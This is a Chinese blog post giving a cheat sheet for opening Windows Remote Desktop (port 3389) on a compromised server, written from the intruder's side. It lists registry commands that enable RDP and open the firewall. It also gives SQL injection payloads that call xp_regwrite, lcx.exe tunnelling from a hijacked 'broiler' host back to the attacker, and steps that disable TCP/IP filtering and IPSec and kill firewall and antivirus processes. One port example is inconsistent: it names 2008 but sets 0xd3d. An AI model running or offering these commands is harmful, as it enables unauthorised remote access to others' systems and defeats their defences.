windows 3389 远程

3389常用命令:

1.查询终端端口

REG query HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server\WinStations\RDP-Tcp /v PortNumber

2.查看终端一技巧

其实 可以首先可以 使用命令 tasklist /svc 查看,  找到服务名称为 Terms service 所对应的 ID,  在使用命令 netstat -ano

3.开启3389终端

REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f

4.更改端口为2008:(0x7d8)

REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server\Wds\rdpwd\Tds\tcp /v PortNumber /t REG_DWORD /d 0xd3d /f

5.取消系统防火墙对终端服务的限制及IP连接的限制

REG ADD HKLM\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\GloballyOpenPorts\List /v 3389:TCP /t REG_SZ /d 3389:TCP:*:Enabled:@xpsp2res.dll,-22009 /f

6.解决终端超出了最大连接数的命令

mstsc /v:219.232.233.155 /console

7.MSSQL开启关闭3389方法:

开启3389的SQL语句:

              xp_regwrite 'HKEY_LOCAL_MACHINE','SYSTEM\CurrentControlSet\Control\Terminal Server','fDenyTSConnections','REG_DWORD','0'

id=100;exec master.dbo.xp_regwrite 'HKEY_LOCAL_MACHINE','SYSTEM\CurrentControlSet\Control\Terminal Server','fDenyTSConnections','REG_DWORD',0;--

关闭3389的SQL语句:

id=100;exec master.dbo.xp_regwrite'HKEY_LOCAL_MACHINE','SYSTEM\CurrentControlSet\Control\Terminal Server','fDenyTSConnections','REG_DWORD',1;--

 

 

开了3389我们却无法连接:

1:服务器在内网。

lcx.exe转发:

黑客本地:lcx.exe -listen 80 3389

肉鸡:lcx.exe -listen 黑客本地IP 80 肉鸡IP 3389


2:做了tcp/ip筛选。
cmd命令:

cmd /c regedit -e c:\1.reg HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\Tcpip #导出注册表里关于TCP/IP筛选的第一处

cmd /c regedit -e c:\2.reg HKEY_LOCAL_MACHINE\SYSTEM\ControlSet002\Services\Tcpip #导出注册表里关于TCP/IP筛选的第二处

cmd /c regedit -e c:\3.reg HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip #导出注册表里关于TCP/IP筛选的第三处 然后回到c盘1.reg,2.reg,3.reg

把1.reg,2.reg,3.reg下载回来到自己的硬盘里面编辑一下,找到EnableSecurityFilters这个字段看看dword后面的键值是否为00000000,如果为00000001就说明管理员做了tcp/ip筛选, 我们只要把1改成0就行了,2.reg和3.reg一样的改。


3:做了ip安全策略。
执行cmd命令: cmd /c net stop policyagent 将IPSEC Services服务停了它。再连3389。

.上传mt.exe到目标服务器可执行目录

执行命令:mt.exe -filter off(关闭TCP/IP策略)

4:防火墙。 安全狗。安全软件...

杀掉防火墙,安全够,等安全软件进程....

 

 

posted @ 2013-08-18 12:04  群叔  阅读(762)  评论(0编辑  收藏  举报